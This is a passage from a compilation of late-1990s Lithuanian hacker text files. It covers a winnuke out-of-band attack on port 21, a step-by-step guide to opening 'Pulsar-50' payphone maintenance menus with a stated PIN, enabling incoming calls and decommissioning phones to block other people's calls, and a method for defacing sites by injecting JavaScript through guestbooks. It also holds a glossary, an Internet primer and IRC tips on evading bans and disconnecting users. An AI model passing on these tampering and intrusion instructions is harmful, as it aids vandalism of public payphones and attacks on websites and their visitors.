Exploitint: paprasciausiai issiusk OOB (Out of Band) i porta 21.

Kaip ji exploitint naujokams, ar tiems kurie tingi kaip nors vienaip ar kitaip terliotis: Su bet kokiu winnuke reikia issiust ta packeta (ar ka ten siuncia nukeas) ne i 139 porta, bet i 21 porta. Sis budas turetu tikrai suveikt ant win 3.1 ir kazka girdejau, kad WIN NT 4.0 turi ta pati bug’a.

Taip pat, kai pasijungi prie FTP servo su telnet, DOS, ar UNIX, pabandyk surinkt SYST komanda. Tau tada turetu ismest idomios informacijos apie ta kompa, tai yra: OS, bei info apie FTP serva.

=====================================================================

5.0 :

1. Daemon – programa, kuri klauso, ar niekas nesijungia per koki nors porta, ir jei jungiasi, bendrauja su tuo, kas jungiasi.

2. Root – Useris, kuris UNIXe gali daryti VISISKAI KA NORI. Tai yra, jis gali keist kitu user’iu passwordus, kreatint naujus userius, trint ka tik nori, ir pan. pan.

3. Flames – kai ant kieno nors varai, tai yra vadini ji visokiu daunu, lochu, debilu, gejum ir pan. Flameinama paprastai per e-maila.

4. ISP – Internet service provider. Jei nesupranti angliskai, tai Interneto rysio tiekejas.

5. Read-access, write-access ir pan. – tai tam tikri tavo veiksmu apribojimai. Jei turi read-access, tai gali tik skaityti ir atsisiusti, ir tai ne visus failus. Jei turi write-access, tai gali irasyti i sistema ka nori, bet negali daryti ka nori. Root-access gali daryti KA TIK NORI.

=====================================================================

Laukite sio texto papildymo.

Si texta rase spadofora. Ate

Iki pasimatymo NETE!

2000.05.21 17:05

16. Taksofonai zhaliems

Visishko idioto ivadas i praktine telefonija

“TAKSOFONAI ZHALIEMS”

Parenge: ww0lf

1999, Kaunas

Ishpostinus cyberia/MG failiuka apie taksofonu “Pulsar-50” meniu, susilaukeme

didelio demesio ir labai daug klausimu, kas ten yra kaip 🙂

Pavarges atsakineti i klausimus, nutariau parashyti kiek ishsamesni teksta

shia tema. Taigis.

Shiuo metu Lietuvoje labiausiai paplite yra “Pulsar-50” taksofonai, liaudyje

vadinami “czipiniais”. Daugelis vartotoju linke naudotis jais kaip nurodo

“Lietuvos telekomo” instrukcija. Ir mazhai kas zhino, kad shis taksofonas –

tai mazhytis kompiuteris, kuri galima konfiguruoti, aktyvuoti vienas ar

kitas funkcijas ir gauti ish jo aibe naudingos informacijos. Taksofonas

valdomas per meniu, labai panashu i mobiliuju telefonu meniu, ir jeigu

jums kada teko naudotis mobiliaku, jus visai nesunkiai susigaudysite.

Visa informacija taksofone pateikiama dvieju eilucziu skystuju kristalu (LCD)

ekrane (tame pacziame, kuriame jus matote jusu renkama numeri ir kiek jums

liko kreditu). Musu tekste mes vaizduosime tai, ka jus matote ekrane

kvadratiniuose skliaustuose, pvz:

[IDEKITE KORTELE ARBA]

[NEMOKAMAS NUMERIS ]

Tai, ka jus renkate taksofono klaviaturoje, vaizduosime figurinese

skliaustuose, pvz:

{8191} – reishkia suspaudzhiame mygtukus 8 1 9 1

Paaishkinimas visishkam idiotui: klaviatura – tai taksofono mygtukai. 🙂

Taigi.

I meniu ieinama ivedus PIN koda , kurio uzklausimas pasirodo taksofono

LCD monitoriuje *stipriai* pakelus apatini-kairiji taksofono kampa.

Ishtikruju jis turi pasiridyti atidarius taksofona specialiuoju raktu,

bet pakelus taksofono kampa mes emuliuojame jo atidaryma.

[PIN CODE ? : ]

[ ]

Pin kodas yra keturiu skaitmenu ir dabar visoje Lietuvoje galiojantis pin

kodas yra 3707.

Noredami ieiti i meniu surenkame:

{3707}

Ivedant pin koda, skaicziu ekrane nesimato, juos atstoja simbolis ‘*’:

[PIN CODE ? : *** ]

[ ]

Ivedus pin koda, ekrane pasirodo pirmoji meniu opcija

(opcija – meniu punktas):

[SETTINGS ]

[ ]

Taksofono meniu yra valdomas taksofono mygtuku pagalba.

Mygtuku reikshmes:

<- 7 (i kaire: parodo sekanczia einamojo meniu opcija)

-> 9 (i desine: parodo priesh tai esanczia einamojo meniu opcija)

8 (iseiti is submeniu i aukstesnio lygio meniu)

0 (ieiti i submeniu arba keisti reiksme)

* (BACKSPACE funkcija – ishtrina paskutini ivesta skaitmeni)

# (ENTER funkcija – patvirtina pasirinktus ar ivestus duomenis )

Meniu struktura

Meniu susideda ish opciju, kurias pasirinkus ieinama i kitus submeniu

(gylesnio lygio meniu), parodoma tam tikra informacija arba atliekamos

tam tikros operacijos.

Pagrindinis meniu

Pagrindinis meniu turi 6 opcijas, kurios pasirenkamos klavishais {7} arba {9}

Sekanti opcija pasirenkama klavishu {9}, priesh tai buvusi – {7}.

Pagrindinio meniu opcijos:

[SETTINGS ]

[ ]

parametru meniu

[COMMISSIONING ]

[ ]

prijungimo prie tinklo meniu

[DECOMMISSIONING ]

[ ]

atjungimo nuo tinklo meniu

[MAINTENANCE ]

[ ]

informacija ir testavimas

[CHANGE BATTERY ]

[ ]

bateriju keitimas

[SOFT INFOS ]

[ ]

skambucziu statistika

I kiekviena opcija ieinama paspaudus klavisha {0}, o isheinama i aukshtesnio

lygio meniu (shiuo atveju – pagrindini meniu) paspaudus klavisha {8}

1. Opcija SETTINGS (parametru meniu)

Iejus i shia opcija {0} galima matyti ir keisti kai kuriuos taksofono

parametrus. Virshutineje eiluteje rodomas parametro pavadinimas, o

apatineje – einamoji parametro reikshme, kuria galima keisti. Parametrai

pasirenkami klavishais {9} arba {7}. Parametru reikshmes keicziamos taip pat

klavishu {0}

Parametrai:

1.1 DIAL MODE parametras – nustato numerio rinkimo buda ir gali buti:

[DIAL MODE : ]

[LDD (PULSE) ]

pulsinis rinkimas

arba

[DIAL MODE : ]

[MFD (DTMF) ]

toninis rinkimas

1.2 CHARGING MODE parametras – nustato pokalbio apmokestinimo buda ir gali

buti:

[CHARGING MODE : ]

[TARIF TABLE ]

pagal tarifu lentele

arba

[CHARGING MODE : ]

[METER PULSES ]

skaicziuojant pulsus

1.3 CALL START CRITERIA parametras – nustato pokalbio pradzhios pozhymi ir

gali buti:

[CALL START CRITERIA:]

[POLARITY REVERSAL ]

poliarishkumo pasikeitimas

arba

[CALL START CRITERIA:]

[METER PULSES ]

skaicziuojant pulsus

1.4 INCOMING CALLS parametras – nustato ar leisti ieinanczius skambuczius

ir gali buti:

[INCOMING CALLS ]

[ALLOWED ]

i taksofona paskambunti galima

arba

[INCOMING CALLS ]

[NOT ALLOWED ]

i taksofona paskambinti negalima.

1.5 DEFAULT LANGUAGE parametras – nustato pagrindine taksofono tarnybiniu

praneshimu kalba ir gali buti:

[DEFAULT LANGUAGE : ]

[LITHUANIAN ]

lietuviu

arba

[DEFAULT LANGUAGE : ]

[ENGLISH ]

anglu

Nepaisant shio parametro, pats meniu visada bus rodomas anglu kalba.

1.6 LINE CURRENT parametras:

[LINE CURENT : 37mA ] – tel. linijos sroves stiprumas mikroamperais

[BATTERY TO PLUG: YES] – parodo, ar galimas maitinimas nuo bateriju

Shio parametro negalima keisti ir jis yra informacinio pobudzhio

1.7 – 1.10 Garso parametrai decibelais:

1.7

[MICRO GAIN DELTA : ] – mikrofono

[ 0 dB ]

1.8

[DTMF GAIN DELTA : ] – toninio rinkimo

[ 0 dB ]

1.9

[MODEM GAIN DELTA : ] – modemo

[ 0 dB ]

1.10

[EARPHONE GAIN DELTA:] – ausines

[ 0 dB ]

Shiuos parametrus galima keisti klavishais {NEXT CALL} – padidinti ir

{NEXT CARD} – sumazhinti.

NEXT CALL klavishas – treczias ish virshaus kaireje eileje

NEXT CARD klavishas – apatinis kaireje eileje

2.Opcija COMMISSIONING – taksofono ijungimo i tinkla parametrai:

2.1.PAYPHONE ID parametras – numeris, kuriuo shis taksofonas figuruoja

tinkle.

[PAYPHONE ID : ]

[27320914 # ]

Kauno apskrityje shis numeris yra ir taksofono telefono numeris:

27 – Kauno kodas, 320914 – numeris

Vilniuje taksofono numeracija kiek kitokia

2.2.REMAS PHONE NUMBER parametras – stoties, kuri aptarnauja shi

taksofonu tinkla telefono numeris. Juo taksofonas susisiekia su stotimi

vykdant ijungimo i tinkla ar ishjungimo ish tinklo funkcijas

[REMAS PHONE NUMBER:]

[360660 ]

Shiaip paskambinus shiuo numeriu ishgirsite modemo tona.

2.3.COMMISSIONING meniu punktas vykdo taksofono ijungimo i tinkla

funkcija

[COMMISSIONING (#) ]

[ ]

Funkcijos ivykdymui reikia paspausti {#}. Ekrane pasirodo uzhrashas

[COMMISSIONING ]

[IN PROGRESS. ]

ir ragelyje girdisi kaip taksofonas renka REMAS numeri ir paskui

modemas perduoda informacija

3.Opcija DECOMMISSIONING – taksofono ishjungimas ish tinklo. Iejus i ja

matome tik viena meniu punkta:

3.1. DECOMMISSIONING meniu punktas – vykdo taksofono ishjungimo ish tinklo

funkcija

[DECOMMISSIONING(#)]

[ ]

Funkcijos ivykdymui reikia paspausti {#}. Funkcija veikia analogishkai

COMMISSIONING funkcijai, tik informacijos perdavimas vyksta trumpiau.

4.Opcija MAINTENANCE – informacija ir testavimas

Punktai:

4.1.SOFTWARE RELEASE

VXX.XX # (02.07)

4.2.PARAMETERS

VXX.XX # (00.01)

4.3.CARDS ACCEPTANCE

VXX.XX # (01.11)

4.4.CALL CATEGORIES

VXX.XX # (01.36)

4.5.TT INT. NUMBERS

VXX.XX # (01.36)

4.6.TT NAT. NUMBERS

VXX.XX # (01.36)

4.7.TT DAYS

VXX.XX # (01.36)

4.8.TT SCHEDULES

VXX.XX # (01.36)

4.9.TT TARIFFS

VXX.XX # (01.36)

4.10.TT MEANS OF PAYMENT

VXX.XX # (00.00)

Parodo taksofono programines irangos versiju numerius. Shiu parametru ish

klaviaturos pakeisti negalima.

4.11.DATE/TIME punktas – parodo einanczia data ir laika:

[DATE : 99/05/31 ] – data

[TIME : 09:11:23 ] – laikas

4.12.- 4.20 punktai – Taksofono testai

4.12

<-

[? ? ? ? ? ? ? ? ? ? ]

[ ? ? ? ? ? ? ? ? ? ?]

LCD ekrano testas

4.13

->

[ ? ? ? ? ? ? ? ? ? ?]

[? ? ? ? ? ? ? ? ? ? ]

4.14 Ragelio testas – Taksofonas patikrina ragelio veikima.

4.15 Mygtuku testas

[PUSH KEY 1 ] Analogishkai patikrinami visi mygtukai

[ ]

po kurio pasirodo uzhrashas

[PAYPHONE COMPARTMENT]

[ACCESS(39) ]

4.16 Korteles testas

[INSERT A CHIP CARD ]

[THEN PRESS # ]

Ikishus kortele ir paspaudus {#} pamatome uzhtasha

[DEBIT ONE UNIT (#) ]

[ ]

Dabar paspaudus {#} taksofonas nuims nuo korteles viena kredita

4.17. Kalibravimas.

[INSERT A CHIP CARD ]

[START CALIBRATION(#)]

Idejus kortele ir paspaudus {#} taksofonas atlieka kalibravima

4.18. ANTIWIRING’o testas , reikalinga “WIRE” kortele.

[INSERT A WIRE CARD ]

[TEST ANTIWIRING (#)]

Paspaudus {#} taksofonas atlieka testa.

4.18. Slotu Testas – patikrina lizdus ishpletimo blokams

Testas atliekamas automatishkai:

[SMTEST ]

[IN PROGRESS. ]

o atlikus testa pasirodo rezultatai:

[SLOT1 : SM 6506 ] – pirmame lizde modulis 6506

[SLOT2 : BAD SM ] – antras lizdas tushczias

4.19. Ryshio su telefono stotimi patikrinimas:

[REMAS CONNECTION ]

[ ]

Paspaudus {#} taksofonas renka REMAS numeri ir ragelije girdimi modemo garsai

[CONNECTION ]

[IN PROGRESS. ]

sekmingai atlikus shi testa pasirodo uzhrashas

[SUCCESFUL TRANSMIS.]

[ ]

5. Opcija BATTERY CHANGE – skirta bateriju pakeitimui ir turi tik viena

punkta:

[CHANGE THE BATTERY ]

[THEN PRESS # ]

6.Opcija SOFT INFOS – skambucziu statistika.

Siame skyriuje issaugoma 30 (00-29) is taksofono rinktu numeriu.

Kartu issaugojama data ir laikas. Pvz:

[(00) 0 X 02000002 ]

[ 05/15 17:58 ]

Turekite omeny, kad telefono numeriai saugomi ne deshimtainiu formatu,

o greicziausia sheshioliktainiu, tixliai nezhinau, neturejau laiko

nagrineti, kol rashiau shi trumpa failiuka, tad jums teks patiems tai

ishsiaishkinti 🙂

Ishejimui ish meniu reikia isheiti ish submeniu i pagrendini meniu klavisho

{8} pagalba, pagrindiniame meniu taip pat paspausti {8} ir pasirodzhius

uzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ]

[LOCAL MAINTENANCE? ]

patvirtinti savo pasirinkima klavishu {#}.

Pasirodzhius praneshimui

[HANG UP, CLOSE THE ]

[DOOR AND REMOVE CARD]

padeti rageli.

O dabar, kaip tuo pasinaudoti praktishkai?

Pvz.1:

Jus stovite Kaune, Laisves alejoje ir jums zhutbut reikia aptarti viena

reikala su draugeliu, kuris dabar yra namuose, jusu mobiliako akumas

nusedes, o taksofono korteleje liko tik vienas kreditas.

Isheitis – tegul jusu draugelis perskambina jums i taksofona.

Bet Laisves alejoje nei ant vieno taksofono nera uzhrashytas jo numeris,

o dauguma Kauno taksofonu neleidzhia i juos paskambinti.

Taigi, jus einate prie artimiausio taksofono. Jums reikia suzhinoti jo numeri

ir atblokuoti ieinancziojo ryshi funkcija:

1.) Pakeliate kairiji taksofono kampa ir matote pin kodo uzhklausima

[PIN CODE ? : ]

[ ]

2.) Ivedate pin koda: {3707} ir matote pirmaja opcija:

[SETTINGS ]

[ ]

3.) Ieinate i submeniu paspaudus klavisha {0} ir matote submeniu punkta:

[DIAL MODE : ]

[MFD (DTMF) ] – czia gali buti ir PULSE uzhrashas

4.) “Prasukate” meniu su klavishu {9} per 3 punktus (spaudzhiate ji 3 kartus)

kol ekrane pasirodys meniu punktas

[INCOMING CALLS ]

[NOT ALLOWED ]

5.) Pakeicziate shi parametra paspaude klavisha {0} ir matote:

[INCOMING CALLS ]

[ALLOWED ]

Dabar i shi taksofona galima paskambinti. Jeigu parametras ALLOWED

jau buvo nustatytas jums iejus i shi meniu punkta, vadinasi jums

pasiseke ir nieko czia keisti nereikia . Abiem atvejais, isheiname i

pagrindini meniu klavishu {8} ir vel matome opcija

[SETTINGS ]

[ ]

6.) “Prasukate” pagrindini meniu su klavishu {9} viena karta, kol ekrane

pasirodo opcija

[COMMISSIONING ]

[ ]

Ieinate i ja su klavishu {0} ir ishkart matote parametra

[PAYPHONE ID : ]

[27320914 # ]

Taigi, czia ir yra taksofono telefono numeris, kur 27 – Kauno kodas,

o 320914 – numeris.

7.) Isheinate i pagrindini meniu paspaude {8}, vel spaudzhiate {8}.

ir pasirodzhius uzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ]

[LOCAL MAINTENANCE? ]

patvirtinkite savo pasirinkima klavishu {#}.

Pasirodzhius praneshimui

[HANG UP, CLOSE THE ]

[DOOR AND REMOVE CARD]

padekite rageli. Dabar su jusu vieninteliu kreditu skambinate savo

draugeliui ir prashote, kad perskambintu telefonu, kuri jus matete ekrane

(musu pavizdyje – 320914, arba jeigu jusu draugelis yra kitame mieste –

8-27-320914) ir padeje rageli laukiate skambuczio. Suskambejus taksofonui,

pakeliate rageli ir kalbates 🙂 Jusu pokalbio metu ekranas atrodys taip:

[IEINANTIS RYSYS ]

[ ]

o jusu draugeliui uzh pokalbi teks moketi tiek pat, kiek skambinant iprastu

telefono numeriu.

Pvz.2:

Jums ish chuliganishku ar kitokiu paskatu reikia, kad niekas ishskirus jus

negaletu paskambinti ish tam tikro taksofono :). Jums tereikia atjugti shi

taksofona nuo tinklo (kitais zhodzhiais – uzhblokuoti ji):

1.) Ieinate i taksofono meniu kaip nurodyta pirmame pavizdyje ir ishsirenkate

opcija

[DECOMMISSIONING ]

[ ]

2.) Ieinate i ja su klavishu {0} ir pamate

[DECOMMISSIONING (#)]

[ ]

Spaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri ir

modemu perduoda informacija. Tuo metu ekrane matote

[DECOMMISSIONING ]

[IN PROGRESS. ]

Kai taksofonas baigia informacijos perdavima, ekrane pasirodo:

[DECOMMISSIONING ]

[OK ]

3.) Dabar jus galite isheiti ish meniu kaip nurodyta pirmame pavizdyje ir

padeti rageli. Po to, kai jus atjungete taksofona nuo tinklo, bet kas,

norintis paskambinti ish shio taksofono matys ekrane uzhrasha

[TIK SPEC. TARNYBU ]

[NUMERIAI ]

ir negales paskambinit jokiu numeriu ishskirus 01, 02, 03, 04 🙂

Noredami patys paskambinti, jus turesite vel ijungti shi taksofona i tinkla:

1.) Ieinate i taksofono meniu ir pasirenkate opcija

[COMMISSIONING ]

[ ]

2.) Ieinate i ja klavishu {0} , prasukate meniu su {9} kol ekrane pasirodys

punktas

[COMMISSIONING (#) ]

[ ]

ir paspaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri

ir modemu perduoda informacija. Tuo metu ekrane matote:

[COMMISSIONING ]

[IN PROGRESS. ]

Informacijos perdavimas gali uzhtrukti keleta minicziu, o kai baigiasi,

ekrane matome

[COMMISSIONING ]

[OK ]

Taksofonas ijungtas i tinkla 🙂

Jeigu kazhkas netvarkoj (pvz. klaidingai nustatyti taksofono parametrai)

arba informacijos perdavimas nepavyko, pasirodo uzhrashas

[COMMISSIONING ]

[NOT OK ]

Tada nustatykite tinkamus parametrus ir bandykite dar karta.

3.) Sekmingai atlike prijungimo funkcija, isheikite ish meniu kaip nurodyta

pirmame pvz. ir padekite rageli. Dabar galite skambinti.

Na ir dar vienas patarimas priesh pabaiga – butu nebloga ideja, priesh

zhaidzhiant su taksofono meniu, nusirashyti, kaip buvo nustatyti visi

kintami parametrai, kad prireikus juos butu galima atstatyti. Mes juk

nenorime, kad mieste neliktu nei vieno veikianczio taksofono 🙂

PABAIGOS ZHODIS: Prie viso to reiktu pazhymeti, kad ash asmenishkai nesu

telefonistas o czia pateikta informacija gauta praktiniu bandymu budu,

todel gali pasitaikyti netikslumu ar neaishkumu.

Jeigu jus turite kokiu nors pastebejimu ar galite pridurti ka nors daugiau,

jusu komentarai ir pasiulymai visada laukiami. Su manimi galite susisiekti

adresu: ww0lf@pogrindis.net

Knowledge is power!

ww0lf

-Pabaiga-

eof

17. Ouestbook hack

Puslapio hakinimas per guestbook’a Shtai dar vienas budas nuhakinti web puslapius! Taip buvo nuhakintas ir jaunimas.net ir daug kitu. Kai kurie rimtesni saitai turi apsauga nuo to bet daugumas tiesiog palieka likimo valiai! Tai va zhodziu viska ka tau reikia padaryti tai nueiti i ta puslapi su guest book’u ir parashyti vietoje tavo : “Sveiki man labai patiko jusu puslapis ir t.t.” 🙂 turiu omeni atsilepimu skiltie ar panashiai rashai tiesiog JavaScripta ir nieko daugiau > gali padaryti nuoroda i puslapi ir pan. Tai va zhodzhiu veikimo prinsipas yra toks kad kai irashai guestbooko teksta jis tiesiogiai ji irasho i savo html > nu jei html tai html tu jam duodi Java scripta ir viskas :))) Shtai keli java scripto pavyzdzhiai: Shi funkcija ishmes langeli su OK knopke kurioje bus tekstas : “HAc|{eD By Craft[Eye]” O shis paklaus ar tau 18 metu ir nuves i tam tikra puslapi 🙂 Na tai tiek 🙂 Kaip ash visada sakau Happy Hacking! Craft[Eye] – CraftEye@gmx.net

18. Hackeriai prieš crackerius

Kas yra hackeris?

Hackeris- jis turi išmanyti kompiuteryje.

Turi mokėti programuoti,nes be programavimo nelabai ką ir pahakins

Turi mokėti kalbas anglu ir rusu.

Neskubėti,visus savo veiksmus gerai apgalvoti.

Daug atiduoti pinigu už ineta 🙂

Niekada neturi galvoti, kad kas nors žino už jį daugiau ar mažiau, turi galvoti, kad žino mažiausiai ir reikia tobulintis.

Kuo skiriasi hackeris nuo Crackerio?

Hackeris – žmogus,kuris domisi įvairiomis operacinėmis sistemomis,

jų klaidomis,dažnai programuotojas.

Hackeriai dažnai sugalvoja būdus kaip įsilaužti,dažnai jie gerai išmano

technika.

Jie žino sistemos skyles ir ieško nauju.

Crackeris yra žmogus kuris daug išmanydamas apie “ineta”, ir tinklus griauna

apsaugos sistemas.Tai būdavo žmogus iššifruojantis užkoduota infa.

bet dabar Crackeriai įsilaužinėja į kitus kompus,su skirtingais tikslais:

Prisijunkti,sunaikinti infa, perskaityti ją, gauti passwordus ir t.t

Hackeriai dažnai naudojasi Crackeriu sukurtomis programomis,

Kad patikrintų tinklo saugumą ir t.t

Skirtumas yra toks,kad viskas ką crackeriai daro yra nelegalu.

Crackeriai niekada neišnyks, nes juk jau tokia žmogaus prigimtis naikinti viską kas sukurta.

Skeletaz

2000

19. Internet Hack

Lapkritis ‘Y2K

~23:00 val.

–

Kadangi esu tik begineriz(o gal tik sumautaz lameriz), taj kol kas mano txt’aj

informaciniaj.. na galbut atejz lajkaz, ir me sukurpz ka norz ql. na bet kol

kas tenkisnimes ir tuo. Tajp kad shis txt yra TIK informaciniz.. ajshq kajp

ir visi kiti :))

–

Hi, na taj kajp ejnasi?. oj, ne apie taj juk ash turechiau.. ajshq dabar

kajp visada nuo CraftEye gausiu pzd. kad kol isivazhiuoju nesamoniu priplepu

ir vis apie alu varau.. ;]] oky oky.. No alko now.. jau buvo diena alko dabar

ne.. :)) o dabar nesimiega.. yra chrustiq ir kavoz..na taj apie ka ten mes.. o

tajp apie Internet’a .. hmmm. o kas taj yra. gal su uogiene taj kramtoma..

Patiko chia presh kokiuz metuz kazhkokia radijos stotiz uzhdavine klausyma:

“Kas yra Internetas”.. oj tada taj prisiklausiaj visokiu sapaliojimu.Apie taj

kad I’netaz, taj begalo DIDELIZ ir galingas kompiuteris, arba kad taj

palydovas.. 🙂 Na manau, per metuz liaudiz jau daugiau apie taj suzhinojo.

So just read. sorry, kad be lietuvybez, dar nesusikonfiguravau

mandrake’o.

—————————————————–

Internet[pagal A.Petrovskij, B. Leontjev “Efektinvnij haking”]

***

Internet’az – taj didzhiausiaz kompiuteriniz tinklaz pasaulyje jungiantis

begalo daug kompiuteriu ivajriausiajz metodajz nuo telefoniniu liniju iki

palydovinio ryshio sistemu. Internet’e naudojamas protokolas TCP/IP, qriz

savyje turi”

# IP(Internet protokol) – tarptinklinis protokolaz, kuris prizhiuri

transliacija be jokiu papildomo tvarkymo perduodant duomenis ish vieno

ompiuterio kitam.

# UDP(User Datagram Protocol) – vartojishkas datagram’inis protokolas,

aptarnaujantis transliacija atskiru praneshimu, IP pagalba, be klaidu

tikrinimo.

#TCP(Transmissin Control Protocol) – perdavima kontroliuojantis protokolas,

aptarnaujantis transliacija IP pagalba tikrinantis susijungima.

Kiekvienas kompiuteriz , prijungtas prie I’neto gauna savo IP adresa.

Iternet’o adresa yra 4 bajtu dydzhio ir susideda ish dvieju daliu: tinklo ir

kompiuterio. Pirma dalis rejshkia logini tinkla, kuriam paskirtas adresas.

Antra dalis identifikuoja konkriachiaj ta kompiuteri tinkle.

Pagal susitarima, IP adresas yra ish skaijchiu ishkirtu tashkajz.pvz:

196.219.31.12

~~DNS~~

DNS(Domain Name System) – taj duomenu base, qri lajko informacija apie

kompiuteriuz,qrie yra ijungti i I’neta. Duomenu tipas priklauso nuo

kompiuterio, bet dazhniausiai taj IP adresas ir duomenys marshrutizacijaj.

Patogumo delej, daugelis kompiuteriu turi savo vardus, pvz:

Jonas, Petryte.. just jokin’ :)))

DNS vykdo keleta uzhduochiu, bet pagrindine jos uzhduotis pertvarkyti

kompiuteriu vardus i IP ir atgal. DNS erdve atrodo kajp domenu medis,

artejanchiajz prie medzhio shaknu. Medshio shaknys turi varda, po ja ejna

domenaj aukshtesnio lajpsnio(shakniez domenaj). Egzituoja dvi rushys

aukshto lajpsnio domenaj. USA aukshchiausio vajzduoja arganizacijos struktura.

Ir kajp tajsykle turi triju rajdzhiu varduz:

# .gov – valdzhios istajgoz

# .mil – karines istajgoz

# .com – komercines organizacijos

# .net – tinklo paslaugu tiekejaj

# .org – Ne pelno siekenchios organizacijos

# .edu – moxlo istajgoz

Del domenu uzh USA ribu susijusiu su teritorijos pasiskirstimu naudojami vardaj

ish dvieju rajdzhiu. pvz:

hakeriai.voras.lt – Lietuvoje(kazhi apie ka chia?:)

www.porno.ru – Rusija (geraz sajtaz beje 🙂

~~~Darbaz I’nete~~~

Na ajshq jej turi I’net’a taj ir gali kazhka jame daryti, tam yra rejkalingos

programoz, shtaj keletaz ish ju:

# ping – lejdzhia nustatyti lajka paketo nuejimo iki hosto. [kazhqr girdejau

kad ne vien tam pinginimaz yra naudojamz :]

# traceroute – parodo praejnanchiu paketu kelia kelia tinkle(Sux95 ir SuxNT –

tracert.exe)

# nslookup – lejdzhia perzhiureti DNS serveriu palajkima

# telnet – Nustato sujusijungima su nutolusiu kompiuteriu(23 portas) ir

lejdzhia dirbti nutolusio terminalo rezhime

# ftp – lejdzhia kejstis fajlajz naudojant FTP(File Transfer Protocol)

protokola(21 portas)

# finger – parodo informacija apie vartotojus dirbanchius tinkle.

Darbuj su WWW(World Wide Web) naudojamos programos Netscape Navigator vs

Internet Explorer, etc. Shioz programoz jungiasi su serveriu(80 portas) ir

dirba su protokolu HTTP.

————————————————

Na ka ir viskaz.. shiaj nakchiaj tiek. dabar tex sustot su txt. linux’u ir

viskuo kitu :((( Ne ne ne vyrukaj su juodajz drabuzhiajz beldzhiasi i duriz,

bet arteja, ne ne ir ne apokalipse. o sumauta sesija. ech. na o po to

palajma – 4T0$T0G0Z.. what’z ql.. .bu lajko viskam, i think so..

————————————————

Shi txt galima lajsvaj platinti, bet NIEKO nekejsti.

Kadangi tikraj nemanau, kad shis txt yra idealuz, taj laukiu patajsymu ir

klajdu tajsymu, bej pasiulymu y-majl: j-azz@centras.lt

================================================================

J-azz

#Ne, ash – ne hackeriz, tiesiog blogai miegojau.#

20. Keletas irc pamokėlių

ﾉﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍｻ

ｺ . keletas IRC pamokeliu by mr2 . ｺ

ﾈﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍｼ

“Communications without intelligence is noise;

Intelligence without communications is irrelevant.”

ﾉﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｻ

ｳ <<< turinys >>> ｳ

ﾈﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｼ

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[1]] tau uzdejo bana . o tau nors verk reikia ｳ

ｳ patekt i ta kanala 😉 ｳ

ｳ [[2]] hmm . neturiu jokio *IRC (nej mIRC . ｳ

ｳ nej pIRC . zodziu jokio) o tajp nera laiko ｳ

ｳ ji parsisiust ir tajp reikia pasikalbet ;((( ｳ

ｳ [[3]] kaip pasidaryti savo script ? (trumpai) ｳ

ｳ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ｳ

ｳ atjungiam chiuwaka ? (ir kajp nuo to paciam ｳ

ｳ apsisaugot) ｳ

ｳ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

ﾉﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｻ

ｳ <<< textas >>> ｳ

ﾈﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｼ

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[1]] tau uzdejo bana . o tau nors verk reikia ｳ

ｳ patekt i ta kanala 😉 ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

reikalas tame kad kartais (shiaip apie 30% atveju

(gal biski daugiau . gal maziau)) jei jums

kokiame taj kanle uzdejo bana . norint patekt

i ta kanla uztenka :

1) pasikeist nick’a arba .

2) Options/Connect/Identd/ . User ID: langelyje

pakeist UserId duomenis . (kad suveiktu reikia

diskonektintis ir vel konektintis) jei nepavyko

lieka trechias (tikraj nepaskutinis) .

3) (sis galima sakyt ish 2-ju daliu susidarantis

punktas priklauso dazniausiaj nuo to ka jus

prisidirbot tame kanale) reiskias parasot

“/names [#kanalo pavadinimas]” paziurit nick’us

su op’ais (priesajs nick’a @ pvz : @agurkaz) ir

paprasot jo nuimt bana . pvz :

“/msg agurkaz plz nuimk bana [#kanalo_pav] kanale

arba “/notice [#kanalas] nuimkit bana or smth”

(shiuo atveju zhinute gaus visi esantys kanale)

o kitas varijantas : jei kanalas kuriame gavot +b

sedi nedidelis skaicius zmoniu . taj paprastaj

